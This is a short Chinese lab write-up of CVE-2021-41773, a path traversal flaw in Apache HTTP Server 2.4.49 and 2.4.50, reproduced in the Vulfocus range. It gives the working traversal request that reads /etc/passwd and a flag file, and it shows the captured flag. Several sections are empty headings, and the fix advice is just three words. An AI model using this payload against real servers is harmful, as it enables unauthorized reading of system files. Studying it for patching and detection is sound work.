1.1漏洞描述
| 漏洞编号 | cve_2021_41773 |
| 漏洞类型 | 路径穿越 |
| 漏洞等级 | 高危 |
| 漏洞环境 | vulfocus |
| 攻击方式 |
1.2漏洞等级
高危
1.3影响版本
Apache HTTP Server 2.4.49、2.4.50
1.4漏洞复现
1.4.1.基础环境
| 靶场 | VULFOCUS |
| 工具 | BurpSuite |
1.4.2.前提
1.5深度利用
1.5.1漏洞点
利用网上爆出得poc代码尝试获取/etc/passwd中得内容,poc如下,可轻松得到敏感内容
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
查看/tmp/flag
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/tmp/flag
拿到flag
flag-{bmhd9509045-100c-4d25-8e8b-11f345f94b4e}
1.6漏洞挖掘
1.6.1指纹信息
1.7修复建议
-
升级
-
打补丁
-
上设备
